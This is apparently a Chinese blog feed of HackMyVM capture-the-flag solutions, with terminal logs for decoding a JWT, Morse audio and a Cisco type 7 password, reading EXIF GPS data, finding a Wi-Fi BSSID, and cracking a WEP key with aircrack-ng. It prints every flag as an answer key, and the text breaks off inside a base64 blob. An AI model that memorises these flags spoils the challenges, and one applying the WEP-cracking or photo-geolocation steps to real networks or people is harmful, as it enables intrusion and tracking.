+0000https://7r1UMPH.github.io/post/Challenge%20039.html 下载 ``` ┌──(kali㉿kali)-[/mnt/hgfs/gx] └─$ unzip 039.zip Archive: 039.zip inflating: Challenge.txt ┌──(kali㉿kali)-[/mnt/hgfs/gx] └─$ cat Challenge.txt eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzUxMiJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiYWRtaW4iOnRydWUsImZsYWciOiJEb05vdFN0b3JlU2Vuc2l0aXZlRGF0YUhlcmUiLCJpYXQiOjE2OTQ0MTk4ODMsImV4cCI6MTY5NDQyMzQ4M30.GZ29CTL0ggEb7ZNvZU7HjeXKWUdco8uLvEbHdpW0DODJQ74IvOPJsoxhL1o5aOq_GLEoOH4vU9fa9kn67zbJcQyr8kjAojX_oVUHyjH4q0UHVASPGgtZMAASUz84TAiX3AWnKFDsgPKumEas01R1CdOv3HVwfU5az5m45D8TPyBB7JxXQdLZyDIIbq4G8fGVUtj3F9oi96d2AzZrpYb8aGyOMsLeDA2wFXSkLQo--6BsY6zOAgsPNVkjrK5jWVXYuvS4U2SnsIp3Gq6vS6rPv4B4qvcBE5-RJ__ZcPg-eZJF-OJzQ9DlKpRE0wg3dzRJWcqTlp6q1Nbk9VQnHc_lUg ┌──(kali㉿kali)-[/mnt/hgfs/gx] └─$ cat -A Challenge.txt eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzUxMiJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiYWRtaW4iOnRydWUsImZsYWciOiJEb05vdFN0b3JlU2Vuc2l0aXZlRGF0YUhlcmUiLCJpYXQiOjE2OTQ0MTk4ODMsImV4cCI6MTY5NDQyMzQ4M30.GZ29CTL0ggEb7ZNvZU7HjeXKWUdco8uLvEbHdpW0DODJQ74IvOPJsoxhL1o5aOq_GLEoOH4vU9fa9kn67zbJcQyr8kjAojX_oVUHyjH4q0UHVASPGgtZMAASUz84TAiX3AWnKFDsgPKumEas01R1CdOv3HVwfU5az5m45D8TPyBB7JxXQdLZyDIIbq4G8fGVUtj3F9oi96d2AzZrpYb8aGyOMsLeDA2wFXSkLQo--6BsY6zOAgsPNVkjrK5jWVXYuvS4U2SnsIp3Gq6vS6rPv4B4qvcBE5-RJ__ZcPg-eZJF-OJzQ9DlKpRE0wg3dzRJWcqTlp6q1Nbk9VQnHc_lUg ┌──(kali㉿kali)-[/mnt/hgfs/gx] └─$ xxd Challenge.txt 00000000: 6579 4a30 6558 4169 4f69 4a4b 5631 5169 eyJ0eXAiOiJKV1Qi 00000010: 4c43 4a68 6247 6369 4f69 4a53 557a 5578 LCJhbGciOiJSUzUx 00000020: 4d69 4a39 2e65 794a 7a64 5749 694f 6949 MiJ9.eyJzdWIiOiI 00000030: 784d 6a4d 304e 5459 334f 446b 7749 6977 xMjM0NTY3ODkwIiw 00000040: 6962 6d46 745a 5349 3649 6b70 7661 4734 ibmFtZSI6IkpvaG4 00000050: 6752 4739 6c49 6977 6959 5752 7461 5734 gRG9lIiwiYWRtaW4 00000060: 694f 6e52 7964 5755 7349 6d5a 7359 5763 iOnRydWUsImZsYWc 00000070: 694f 694a 4562 3035 7664 464e 3062 334a iOiJEb05vdFN0b3J 00000080: 6c55 3256 7563 326c 3061 585a 6c52 4746 lU2Vuc2l0aXZlRGF 00000090: 3059 5568 6c63 6d55 694c 434a 7059 5851 0YUhlcmUiLCJpYXQ 000000a0: 694f 6a45 324f 5451 304d 546b 344f 444d iOjE2OTQ0MTk4ODM 000000b0: 7349 6d56 3463 4349 364d 5459 354e 4451 sImV4cCI6MTY5NDQ 000000c0: 794d 7a51 344d 3330 2e47 5a32 3943 544c yMzQ4M30.GZ29CTL 000000d0: 3067 6745 6237 5a4e 765a 5537 486a 6558 0ggEb7ZNvZU7HjeX 000000e0: 4b57 5564 636f 3875 4c76 4562 4864 7057 KWUdco8uLvEbHdpW 000000f0: 3044 4f44 4a51 3734 4976 4f50 4a73 6f78 0DODJQ74IvOPJsox 00000100: 684c 316f 3561 4f71 5f47 4c45 6f4f 4834 hL1o5aOq_GLEoOH4 00000110: 7655 3966 6139 6b6e 3637 7a62 4a63 5179 vU9fa9kn67zbJcQy 00000120: 7238 6b6a 416f 6a58 5f6f 5655 4879 6a48 r8kjAojX_oVUHyjH 00000130: 3471 3055 4856 4153 5047 6774 5a4d 4141 4q0UHVASPGgtZMAA 00000140: 5355 7a38 3454 4169 5833 4157 6e4b 4644 SUz84TAiX3AWnKFD 00000150: 7367 504b 756d 4561 7330 3152 3143 644f sgPKumEas01R1CdO 00000160: 7633 4856 7766 5535 617a 356d 3435 4438 v3HVwfU5az5m45D8 00000170: 5450 7942 4237 4a78 5851 644c 5a79 4449 TPyBB7JxXQdLZyDI 00000180: 4962 7134 4738 6647 5655 746a 3346 396f Ibq4G8fGVUtj3F9o 00000190: 6939 3664 3241 7a5a 7270 5962 3861 4779 i96d2AzZrpYb8aGy 000001a0: 4f4d 734c 6544 4132 7746 5853 6b4c 516f OMsLeDA2wFXSkLQo 000001b0: 2d2d 3642 7359 367a 4f41 6773 504e 566b --6BsY6zOAgsPNVk 000001c0: 6a72 4b35 6a57 5658 5975 7653 3455 3253 jrK5jWVXYuvS4U2S 000001d0: 6e73 4970 3347 7136 7653 3672 5076 3442 nsIp3Gq6vS6rPv4B 000001e0: 3471 7663 4245 352d 524a 5f5f 5a63 5067 4qvcBE5-RJ__ZcPg 000001f0: 2d65 5a4a 462d 4f4a 7a51 3944 6c4b 7052 -eZJF-OJzQ9DlKpR 00000200: 4530 7767 3364 7a52 4a57 6371 546c 7036 E0wg3dzRJWcqTlp6 00000210: 7131 4e62 6b39 5651 6e48 635f 6c55 67 q1Nbk9VQnHc_lUg ``` https://gchq.github.io/CyberChef/  ``` HMV{DoNotStoreSensitiveDataHere} ``` 。https://7r1UMPH.github.io/post/Challenge%20039.htmlTue, 17 Jun 2025 04:55:15 +0000https://7r1UMPH.github.io/post/Challenge%20038.html复习复的有点无聊，打几个Challenge吧  下载 ``` ┌──(kali㉿kali)-[/mnt/hgfs/gx] └─$ ll 038.zip -rwxr-xr-x 1 kali kali 15093 Jun 15 23:36 038.zip ┌──(kali㉿kali)-[/mnt/hgfs/gx] └─$ unzip 038.zip Archive: 038.zip inflating: 038.mp3 ``` 非常快速的唧唧歪歪，哈哈哈 慢放试试(audacity)，没有的自己下一个 https://www.audacityteam.org/ 重放到大概0.2倍就可以听到它在说字母(效果器>音高和速度>变速并变调) 但是确实听不清它在说什么，导出去 因为我电脑下来语音转文本的模型，我就直接用了，你们可以丢给ai之类的  ``` HMV{hacktheplanet} ``` 。https://7r1UMPH.github.io/post/Challenge%20038.htmlTue, 17 Jun 2025 04:55:02 +0000https://7r1UMPH.github.io/post/Challenge%20037.html 还是扫街 ``` ┌──(kali㉿kali)-[/mnt/hgfs/gx] └─$ ll 037.zip -rwxr-xr-x 1 kali kali 6256698 Jun 13 22:57 037.zip ┌──(kali㉿kali)-[/mnt/hgfs/gx] └─$ unzip 037.zip Archive: 037.zip inflating: osint.jpg ┌──(kali㉿kali)-[/mnt/hgfs/gx] └─$ exiftool osint.jpg ExifTool Version Number : 13.25 File Name : osint.jpg Directory : . File Size : 6.3 MB File Modification Date/Time : 2023:07:17 21:14:46-04:00 File Access Date/Time : 2025:06:13 22:58:07-04:00 File Inode Change Date/Time : 2023:07:17 21:14:46-04:00 File Permissions : -rwxr-xr-x File Type : JPEG File Type Extension : jpg MIME Type : image/jpeg Exif Byte Order : Little-endian (Intel, II) Make : Sony Camera Model Name : E5823 Orientation : Horizontal (normal) X Resolution : 72 Y Resolution : 72 Resolution Unit : inches Software : 32.2.A.0.253_0_f500 Modify Date : 2016:07:25 20:44:46 Y Cb Cr Positioning : Centered Exposure Time : 1/2000 F Number : 2.0 ISO : 40 Exif Version : 0220 Date/Time Original : 2016:07:25 20:44:46 Create Date : 2016:07:25 20:44:46 Components Configuration : Y, Cb, Cr, - Shutter Speed Value : 1/1992 Exposure Compensation : 0 Metering Mode : Multi-segment Light Source : Unknown Flash : Off, Did not fire Focal Length : 4.2 mm Soft Skin Effect : Off Face Info Offset : 94 Sony Date Time : 2016:07:25 20:44:46 Sony Image Height : 4160 Sony Image Width : 5520 Faces Detected : 0 Face Info Length : 26 Meta Version : Sub Sec Time : 461942 Sub Sec Time Original : 461942 Sub Sec Time Digitized : 461942 Flashpix Version : 0100 Color Space : sRGB Exif Image Width : 5520 Exif Image Height : 4140 Interoperability Index : R98 - DCF basic file (sRGB) Interoperability Version : 0100 Custom Rendered : Normal Exposure Mode : Auto White Balance : Auto Digital Zoom Ratio : 1 Scene Capture Type : Landscape Subject Distance Range : Unknown GPS Version ID : 2.2.0.0 GPS Latitude Ref : North GPS Longitude Ref : East GPS Altitude Ref : Above Sea Level GPS Time Stamp : 18:44:29 GPS Status : Measurement Active GPS Map Datum : WGS-84 GPS Date Stamp : 2016:07:25 Compression : JPEG (old-style) Thumbnail Offset : 21346 Thumbnail Length : 3982 Image Width : 5520 Image Height : 4140 Encoding Process : Baseline DCT, Huffman coding Bits Per Sample : 8 Color Components : 3 Y Cb Cr Sub Sampling : YCbCr4:2:0 (2 2) Aperture : 2.0 Image Size : 5520x4140 Megapixels : 22.9 Shutter Speed : 1/2000 Create Date : 2016:07:25 20:44:46.461942 Date/Time Original : 2016:07:25 20:44:46.461942 Modify Date : 2016:07:25 20:44:46.461942 Thumbnail Image : (Binary data 3982 bytes, use -b option to extract) GPS Altitude : 25 m Above Sea Level GPS Date/Time : 2016:07:25 18:44:29Z GPS Latitude : 58 deg 58' 2.87' N GPS Longitude : 18 deg 18' 59.03' E Focal Length : 4.2 mm GPS Position : 58 deg 58' 2.87' N, 18 deg 18' 59.03' E Light Value : 14.3 ```  有GPS信息！ 将经纬度转换成十进制 https://www.sunearthtools.com/dp/tools/conversion.php?lang=cn  然后我去试不行 后面我尝试添加一点减少一点才成功 正确的是 ``` HMV{58.967463,18.316396} ``` 。https://7r1UMPH.github.io/post/Challenge%20037.htmlSat, 14 Jun 2025 03:15:07 +0000https://7r1UMPH.github.io/post/Challenge%20036.html 找BSSID，先下载 ``` ┌──(kali㉿kali)-[/mnt/hgfs/gx] └─$ ll 036.zip -rwxr-xr-x 1 kali kali 1495216 Jun 13 22:06 036.zip ┌──(kali㉿kali)-[/mnt/hgfs/gx] └─$ unzip 036.zip Archive: 036.zip extracting: 036.png ┌──(kali㉿kali)-[/mnt/hgfs/gx] └─$ exiftool 036.png ExifTool Version Number : 13.25 File Name : 036.png Directory : . File Size : 1495 kB File Modification Date/Time : 2023:08:24 12:20:50-04:00 File Access Date/Time : 2025:06:13 22:06:26-04:00 File Inode Change Date/Time : 2023:08:24 12:20:50-04:00 File Permissions : -rwxr-xr-x File Type : PNG File Type Extension : png MIME Type : image/png Image Width : 1153 Image Height : 721 Bit Depth : 8 Color Type : RGB Compression : Deflate/Inflate Filter : Adaptive Interlace : Noninterlaced SRGB Rendering : Perceptual Gamma : 2.2 Pixels Per Unit X : 3779 Pixels Per Unit Y : 3779 Pixel Units : meters Software : Greenshot Image Size : 1153x721 Megapixels : 0.831 ``` 看看图  google扫街启动 **识别关键标志** su开头的，然后亚洲肤色，然后  这玩意应该在座的各位大学生都认识吧 阳光在线广场 （给我干的怀疑是在china了） 但是，这里有日文  SunLive（日文：サンリブ） 扫街扫街，一时半会找不到，google搜索一下吧  哈哈，有前辈的wp，我们还是不看了，但是他其他的可能都显示了  大概位置：ココカラファイン薬局もりつね店 找找吧  找到了  这里，然后我们要去找**Wi-Fi数据库**扒拉一下了 用 [wigle.net](https://www.google.com/url?sa=E&q=https%3A%2F%2Fwigle.net%2F) 搜索一下： 1 Chome-11-25 Moritsune, Kokuraminami Ward, Kitakyushu, Fukuoka 802-0972日本  然后需要注册一下，不然啥都用不了  啊这，换个网站 我去，没个可以用的，看看前辈的wp吧 https://sec-fortress.github.io/posts/HackMyVM/posts/036.html ``` HMV{00:3A:9A:7B:5F:40} ``` 。https://7r1UMPH.github.io/post/Challenge%20036.htmlSat, 14 Jun 2025 03:14:55 +0000https://7r1UMPH.github.io/post/Challenge%20035.html ``` Help us to decrypt this message: 'Hx Rgjf. H fo 92gm 9p7 C6lnpb3lrp2ax7 sjcf. R7rt qk 1gtw p87 ha81oqjc: MOO{r2w_sh_qbm_f89_mrs5} 9p3pc xtw oojy 235j 8nw ehxlar2ap9 tx, K ayhe dwmt itjumsgn wik d7ds t83glam6!' Unfortunately we only have one clear text message: 'Hi John. I am from the Administrative team. We have just received your request to change your password, it will reach you in a few minutes. Thank you very much for contacting us, I hope your question has been resolved!' 翻译： 帮助我们解密这条消息：“Hx Rgjf. H fo 92gm 9p7 C6lnpb3lrp2ax7 sjcf. R7rt qk 1gtw p87 ha81oqjc: MOO{r2w_sh_qbm_f89_mrs5} 9p3pc xtw oojy 235j 8nw ehxlar2ap9 tx, K ayhe dwmt itjumsgn wik d7ds t83glam6！” 很遗憾，我们只有一条明文消息：“嗨，约翰。https://7r1UMPH.github.io/post/Challenge%20035.htmlSat, 14 Jun 2025 03:14:44 +0000https://7r1UMPH.github.io/post/Challenge%20034.html 下载 ``` ┌──(kali㉿kali)-[/mnt/hgfs/gx] └─$ ll 034.zip -rwxr-xr-x 1 kali kali 3210 Jun 13 11:30 034.zip ┌──(kali㉿kali)-[/mnt/hgfs/gx] └─$ unzip 034.zip Archive: 034.zip inflating: 034.jpg ``` 看看  google识图  ``` HMV{Somalia} ``` 。https://7r1UMPH.github.io/post/Challenge%20034.htmlSat, 14 Jun 2025 03:14:33 +0000https://7r1UMPH.github.io/post/Challenge%20033.html 下载 ``` ┌──(kali㉿kali)-[/mnt/hgfs/gx] └─$ ll 033.zip -rwxr-xr-x 1 kali kali 1538000 Jun 13 10:33 033.zip ┌──(kali㉿kali)-[/mnt/hgfs/gx] └─$ unzip 033.zip Archive: 033.zip inflating: 033.pcap ``` 提示是wep密钥了，所以直接爆破 ``` aircrack-ng 033.pcap Aircrack-ng 1.7 [00:00:00] Tested 60016 keys (got 17273 IVs) KB depth byte(vote) 0 0/ 1 4D(28160) 24(23808) 58(23552) 44(22528) B7(22528) 94(21760) D2(21504) 00(20992) 39(20992) 71(20992) CE(20992) 0B(20736) 1E(20736) 4A(20736) 1 4/ 34 59(21760) E1(21504) 5B(21504) B0(20992) 56(20736) 98(20736) A6(20736) B4(20480) EF(20480) 86(20480) B1(20480) EA(20224) FD(20224) 10(20224) 2 36/ 45 04(19712) 16(19456) 41(19456) 56(19456) 7B(19456) 7C(19456) 81(19456) E6(19456) F1(19456) F2(19456) 8A(19200) B2(19200) E3(19200) 8F(18944) 3 14/ 40 45(20992) D3(20992) 94(20736) 04(20736) 0F(20480) 58(20480) B2(20480) 00(20480) 1E(20224) 20(20224) 31(20224) 57(20224) A1(20224) CB(20224) 4 0/ 1 59(27648) 6F(23040) 25(22016) 20(21760) 38(21760) 30(21504) 53(21504) 67(21504) 84(21504) DB(21504) E7(21504) 08(20992) B8(20736) BE(20736) KEY FOUND! [ 4D:59:4B:45:59 ] (ASCII: MYKEY ) Decrypted correctly: 100% ``` 所以flag ``` HMV{MYKEY} ``` 。https://7r1UMPH.github.io/post/Challenge%20033.htmlFri, 13 Jun 2025 15:05:53 +0000https://7r1UMPH.github.io/post/Challenge%20032.html 下载 ``` ┌──(kali㉿kali)-[/mnt/hgfs/gx] └─$ ll 032.zip -rwxr-xr-x 1 kali kali 5929 Jun 13 10:28 032.zip ┌──(kali㉿kali)-[/mnt/hgfs/gx] └─$ unzip 032.zip Archive: 032.zip inflating: 032.gif ``` 看看  隔着循环播放呢 https://www.pdfpai.com/gif-to-png 扒拉一下静态照片，然后拼一下flag ``` HMV{gifarefun} ``` 。https://7r1UMPH.github.io/post/Challenge%20032.htmlFri, 13 Jun 2025 15:05:36 +0000https://7r1UMPH.github.io/post/Challenge%20031.html 下载 ``` ┌──(kali㉿kali)-[/mnt/hgfs/gx] └─$ ll 030.zip -rwxr-xr-x 1 kali kali 918 Jun 13 09:37 030.zip ┌──(kali㉿kali)-[/mnt/hgfs/gx] └─$ unzip 030.zip Archive: 030.zip inflating: 030.png ┌──(kali㉿kali)-[/mnt/hgfs/gx] └─$ ll 031.zip -rwxr-xr-x 1 kali kali 973 Jun 13 10:11 031.zip ┌──(kali㉿kali)-[/mnt/hgfs/gx] └─$ unzip 031.zip Archive: 031.zip inflating: 031.wav ``` 听一下，ok又是摩斯密码 https://morsecode.world/international/decoder/audio-decoder-adaptive.html  ``` HMV{MORSEGIVESYOUTHEFLAG} ``` 。https://7r1UMPH.github.io/post/Challenge%20031.htmlFri, 13 Jun 2025 15:05:19 +0000https://7r1UMPH.github.io/post/Challenge%20030.html 下载 ``` ┌──(kali㉿kali)-[/mnt/hgfs/gx] └─$ ll 030.zip -rwxr-xr-x 1 kali kali 918 Jun 13 09:37 030.zip ┌──(kali㉿kali)-[/mnt/hgfs/gx] └─$ unzip 030.zip Archive: 030.zip inflating: 030.png ``` 看看  扒拉一个ps，编辑了一下 https://ps.gaoding.com/ 自己改一下  https://cli.im/deqr/other 解码  ``` HMV{qrsospecial} ``` 。https://7r1UMPH.github.io/post/Challenge%20030.htmlFri, 13 Jun 2025 15:05:02 +0000https://7r1UMPH.github.io/post/Challenge%20029.html 子域名 https://zh.subdomains.whoisxmlapi.com/lookup  ``` HMV{publicd0main} ``` 。https://7r1UMPH.github.io/post/Challenge%20029.htmlFri, 13 Jun 2025 15:04:35 +0000https://7r1UMPH.github.io/post/Challenge%20028.html 下载 ``` ┌──(kali㉿kali)-[/mnt/hgfs/gx] └─$ ll 028.zip -rwxr-xr-x 1 kali kali 1967 Jun 12 07:23 028.zip ┌──(kali㉿kali)-[/mnt/hgfs/gx] └─$ unzip 028.zip Archive: 028.zip inflating: 028.wav ``` 听了一下，是摩斯密码 找工具 ``` ┌──(kali㉿kali)-[/mnt/hgfs/gx] └─$ git clone https://github.com/Ling-Ink/MorseAudioDecoder.git Cloning into 'MorseAudioDecoder'... remote: Enumerating objects: 28, done. remote: Counting objects: 100% (28/28), done. remote: Compressing objects: 100% (22/22), done. remote: Total 28 (delta 5), reused 27 (delta 4), pack-reused 0 (from 0) Receiving objects: 100% (28/28), 606.49 KiB | 416.00 KiB/s, done. Resolving deltas: 100% (5/5), done. ┌──(kali㉿kali)-[/mnt/hgfs/gx] └─$ cd MorseAudioDecoder ┌──(kali㉿kali)-[/mnt/hgfs/gx/MorseAudioDecoder] └─$ python3 main.py ../028.wav _wave_params(nchannels=1, sampwidth=1, framerate=8000, nframes=345520, comptype='NONE', compname='not compressed') wave avg: 24500 Drawing Morse Image: 100%|████████████████████████████████████████████████████████████████████████████████████████████████████████████| 172760/172760 [00:00<00:00, 3670573.72it/s] morse block avg: 7.958333333333333 morse blank avg: 4.034722222222222 Morse Result: -/-/-/--/----/-/--/-----/-/-----/--/-/-/--/----/-/-/---/-/--/-/---/----/-/--/-/-/-/--/-/-/--/--/--/-/----/---/-/--/-/----/-/---/--/--/-/---/--/--/-/--/-/-/---/-/----/-/--/-/--/-/-/-/--/-/---/----/-/---/--/--/-/---/--. Traceback (most recent call last): File '/mnt/hgfs/gx/MorseAudioDecoder/main.py', line 120, in <module> plain_text += morse_dict[morse] ~~~~~~~~~~^^^^^^^ KeyError: '----' ``` 寄 去其他地方扒拉一下 https://morsecode.world/international/decoder/audio-decoder-adaptive.html 我快滴滴答傻了  ``` ETTTETEEETTETEEEETTEEEETETTTETEEETTTEETTETTEETEEETTETTTTETTTETETETTEEETEETTETTEEETTEETETETTEETETETTETTTEETTEEETTETTETTTTETTEETEEETTEETETETTEETEE ``` 解密 ``` ┌──(kali㉿kali)-[/mnt/hgfs/gx] └─$ cat tmp.txt ETTTETEEETTETEEEETTEEEETETTTETEEETTTEETTETTEETEEETTETTTTETTTETETETTEEETEETTETTEEETTEETETETTEETETETTETTTEETTEEETTETTETTTTETTEETEEETTEETETETTEETEE ┌──(kali㉿kali)-[/mnt/hgfs/gx] └─$ cat tmp.txt | sed 's/E/0/g' | sed 's/T/1/g' 011101000110100001100001011101000111001101100100011011110111010101100010011011000110010101100101011011100110001101101111011001000110010101100100 ```  ``` HMV{thatsdoubleencoded} ``` 。https://7r1UMPH.github.io/post/Challenge%20028.htmlThu, 12 Jun 2025 13:02:49 +0000https://7r1UMPH.github.io/post/Challenge%20027.html ``` ┌──(kali㉿kali)-[/mnt/hgfs/gx] └─$ curl http://momo.hackmyvm.eu/t0r1k34s3/ Where is my flag? ┌──(kali㉿kali)-[/mnt/hgfs/gx] └─$ curl -i http://momo.hackmyvm.eu/t0r1k34s3/ HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Thu, 12 Jun 2025 11:22:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Flag: HMV{flaginmyheader} Where is my flag? ``` 。https://7r1UMPH.github.io/post/Challenge%20027.htmlThu, 12 Jun 2025 11:22:50 +0000https://7r1UMPH.github.io/post/Challenge%20026.html 下载 ``` ┌──(kali㉿kali)-[/mnt/hgfs/gx] └─$ ll 026.zip -rwxr-xr-x 1 kali kali 160499 Jun 12 07:16 026.zip ┌──(kali㉿kali)-[/mnt/hgfs/gx] └─$ unzip 026.zip Archive: 026.zip inflating: 026.jpg ```  右上角   ``` HMV{Türkiye} ``` 应该是这个英语，自己试试。https://7r1UMPH.github.io/post/Challenge%20026.htmlThu, 12 Jun 2025 11:21:02 +0000https://7r1UMPH.github.io/post/Challenge%20025.html 下载 ``` ┌──(kali㉿kali)-[/mnt/hgfs/gx] └─$ ll 025.zip -rwxr-xr-x 1 kali kali 1495709 Jun 12 07:12 025.zip ┌──(kali㉿kali)-[/mnt/hgfs/gx] └─$ unzip 025.zip Archive: 025.zip inflating: 025.png ```   放大  ``` HMV{whattimeisit} ``` 如果不对，直接对照一下。https://7r1UMPH.github.io/post/Challenge%20025.htmlThu, 12 Jun 2025 11:15:39 +0000https://7r1UMPH.github.io/post/Challenge%20024.html 拿个浏览器，访问这个网页，你会发现flag一闪而过 拿个burp抓就好了  ``` HMV{fastredirect} ``` 。https://7r1UMPH.github.io/post/Challenge%20024.htmlThu, 12 Jun 2025 11:12:16 +0000https://7r1UMPH.github.io/post/Challenge%20023.html ``` 022E296D100B1622455D0A16031B130C11 ``` cisco type 7 https://www.firewall.cx/cisco/cisco-routers/cisco-type7-password-crack.html  ``` HMV{myciscoflag} ``` 。https://7r1UMPH.github.io/post/Challenge%20023.htmlThu, 12 Jun 2025 11:09:33 +0000https://7r1UMPH.github.io/post/Challenge%20022.html 下载 ``` ┌──(kali㉿kali)-[/mnt/hgfs/gx] └─$ ll 022.zip -rwxr-xr-x 1 kali kali 197976 Jun 12 06:57 022.zip ┌──(kali㉿kali)-[/mnt/hgfs/gx] └─$ unzip 022.zip Archive: 022.zip extracting: 022.png ```  https://www.dcode.fr/symbols-ciphers 打开列表找就完事了  https://www.dcode.fr/birds-on-a-wire-cipher  ``` BLUEBIRD ``` 。https://7r1UMPH.github.io/post/Challenge%20022.htmlThu, 12 Jun 2025 11:03:06 +0000https://7r1UMPH.github.io/post/Challenge%20021.html 下载 ``` ┌──(kali㉿kali)-[/mnt/hgfs/gx] └─$ ll 021.zip -rwxr-xr-x 1 kali kali 3576 Jun 12 06:41 021.zip ┌──(kali㉿kali)-[/mnt/hgfs/gx] └─$ 7z x 021.zip 7-Zip 24.09 (x64) : Copyright (c) 1999-2024 Igor Pavlov : 2024-11-29 64-bit locale=en_US.UTF-8 Threads:128 OPEN_MAX:1024, ASM Scanning the drive for archives: 1 file, 3576 bytes (4 KiB) Extracting archive: 021.zip -- Path = 021.zip Type = zip Physical Size = 3576 Everything is Ok Size: 21982 Compressed: 3576 ┌──(kali㉿kali)-[/mnt/hgfs/gx] └─$ cat 21.txt f0VMRgIBAQAAAAAAAAAAAAMAPgABAAAAcBAAAAAAAABAAAAAAAAAAAA3AAAAAAAAAAAAAEAAOAAN AEAAHwAeAAYAAAAEAAAAQAAAAAAAAABAAAAAAAAAAEAAAAAAAAAA2AIAAAAAAADYAgAAAAAAAAgA AAAAAAAAAwAAAAQAAAAYAwAAAAAAABgDAAAAAAAAGAMAAAAAAAAcAAAAAAAAABwAAAAAAAAAAQAA AAAAAAABAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAALAGAAAAAAAAsAYAAAAAAAAAEAAA AAAAAAEAAAAFAAAAABAAAAAAAAAAEAAAAAAAAAAQAAAAAAAAsQIAAAAAAACxAgAAAAAAAAAQAAAA AAAAAQAAAAQAAAAAIAAAAAAAAAAgAAAAAAAAACAAAAAAAAAsAQAAAAAAACwBAAAAAAAAABAAAAAA AAABAAAABgAAANAtAAAAAAAA0D0AAAAAAADQPQAAAAAAAFgCAAAAAAAAYAIAAAAAAAAAEAAAAAAA AAIAAAAGAAAA4C0AAAAAAADgPQAAAAAAAOA9AAAAAAAA4AEAAAAAAADgAQAAAAAAAAgAAAAAAAAA BAAAAAQAAAA4AwAAAAAAADgDAAAAAAAAOAMAAAAAAAAgAAAAAAAAACAAAAAAAAAACAAAAAAAAAAE AAAABAAAAFgDAAAAAAAAWAMAAAAAAABYAwAAAAAAAEQAAAAAAAAARAAAAAAAAAAEAAAAAAAAAFPl dGQEAAAAOAMAAAAAAAA4AwAAAAAAADgDAAAAAAAAIAAAAAAAAAAgAAAAAAAAAAgAAAAAAAAAUOV0 ZAQAAABUIAAAAAAAAFQgAAAAAAAAVCAAAAAAAAAsAAAAAAAAACwAAAAAAAAABAAAAAAAAABR5XRk BgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQAAAAAAAAAFLldGQE AAAA0C0AAAAAAADQPQAAAAAAANA9AAAAAAAAMAIAAAAAAAAwAgAAAAAAAAEAAAAAAAAAL2xpYjY0 L2xkLWxpbnV4LXg4Ni02NC5zby4yAAAAAAAEAAAAEAAAAAUAAABHTlUAAoAAwAQAAAABAAAAAAAA AAQAAAAUAAAAAwAAAEdOVQCNEdhwtWSejKGgtndxYMH8U/HwUQQAAAAQAAAAAQAAAEdOVQAAAAAA AwAAAAIAAAAAAAAAAAAAAAIAAAAIAAAAAQAAAAYAAAAAAIEAAAAAAAgAAAAAAAAA0WXObQAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQAAAAEgAAAAAAAAAAAAAAAAAAAAAAAABqAAAAIAAAAAAA AAAAAAAAAAAAAAAAAAAiAAAAEgAAAAAAAAAAAAAAAAAAAAAAAAA4AAAAEgAAAAAAAAAAAAAAAAAA AAAAAACGAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAApAAAAEgAAAAAAAAAAAAAAAAAAAAAAAACVAAAA IAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAIgAAAAAAAAAAAAAAAAAAAAAAAAAAX19jeGFfZmluYWxp emUAX19saWJjX3N0YXJ0X21haW4Ac3RybGVuAF9faXNvYzk5X3NjYW5mAHByaW50ZgBsaWJjLnNv LjYAR0xJQkNfMi43AEdMSUJDXzIuMi41AEdMSUJDXzIuMzQAX0lUTV9kZXJlZ2lzdGVyVE1DbG9u ZVRhYmxlAF9fZ21vbl9zdGFydF9fAF9JVE1fcmVnaXN0ZXJUTUNsb25lVGFibGUAAAAAAgABAAMA AwABAAQAAQADAAAAAAAAAAEAAwA/AAAAEAAAAAAAAAAXaWkNAAAEAEkAAAAQAAAAdRppCQAAAwBT AAAAEAAAALSRlgYAAAIAXwAAAAAAAADQPQAAAAAAAAgAAAAAAAAAUBEAAAAAAADYPQAAAAAAAAgA AAAAAAAAEBEAAAAAAAAgQAAAAAAAAAgAAAAAAAAAIEAAAAAAAADAPwAAAAAAAAYAAAABAAAAAAAA AAAAAADIPwAAAAAAAAYAAAACAAAAAAAAAAAAAADQPwAAAAAAAAYAAAAFAAAAAAAAAAAAAADYPwAA AAAAAAYAAAAHAAAAAAAAAAAAAADgPwAAAAAAAAYAAAAIAAAAAAAAAAAAAAAAQAAAAAAAAAcAAAAD AAAAAAAAAAAAAAAIQAAAAAAAAAcAAAAEAAAAAAAAAAAAAAAQQAAAAAAAAAcAAAAGAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 